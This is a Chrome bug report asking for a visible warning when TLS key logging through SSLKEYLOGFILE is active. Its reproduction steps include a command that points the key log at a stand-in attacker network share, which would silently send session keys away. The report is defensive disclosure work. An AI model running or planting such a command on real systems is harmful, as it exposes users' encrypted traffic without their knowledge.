UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Steps to reproduce the problem:
1. Setx SSLKEYLOGFILE \\attacker\shr\allyourkeys [/m]
2. use chrome
3. attacker has all your keys

What is the expected behavior?
The browser UI should notify the user that all his keys are being logged to the attacker's server (or user's own debug directory, etc).

What went wrong?
The capability to log TLS premaster keys to SSLKEYLOGFILE is critical debugging capability, and highly useful for analyzing captures with wireshark.  However, the Browser UI should provide visual feedback to the user to notify/remind them that they are logging all TLS key material.  In the case of a malicious attacker who manages to set a system or user environment variable, the user would have no indication that the confidentiality of his sessions has been compromised.  The browser is displaying "Secure" when it in fact is writing the keys somewhere.

Did this work before? No 

Chrome version: 63.0.3239.132  Channel: stable
OS Version: 10.0
Flash Version: 

Possibly this feature should not exist in the mainstream version of Chrome, for example it is disabled in the Tor browser.